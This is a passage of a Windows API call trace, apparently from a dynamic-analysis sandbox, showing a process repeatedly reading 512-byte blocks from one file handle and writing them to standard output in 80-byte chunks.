[0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 
[0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0092.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.719] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.720] GetFileType (hFile=0x4c) returned 0x1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.720] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.720] GetFileType (hFile=0x4c) returned 0x1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.720] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.720] GetFileType (hFile=0x4c) returned 0x1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.720] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.721] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.721] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType 
(hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] GetFileType (hFile=0x4c) returned 0x1 [0092.721] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.721] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.722] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.722] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, 
lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] GetFileType (hFile=0x4c) returned 0x1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.722] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.722] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, 
lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.723] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.723] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] GetFileType (hFile=0x4c) returned 0x1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.723] WriteFile (in: hFile=0x4c, 
lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.723] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.724] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] GetFileType (hFile=0x4c) returned 0x1 [0092.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.724] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.725] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, 
lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] GetFileType (hFile=0x4c) returned 0x1 [0092.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.725] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: 
lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.726] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] GetFileType (hFile=0x4c) returned 0x1 [0092.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.726] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.727] GetFileType (hFile=0x4c) returned 0x1 [0092.727] _get_osfhandle 
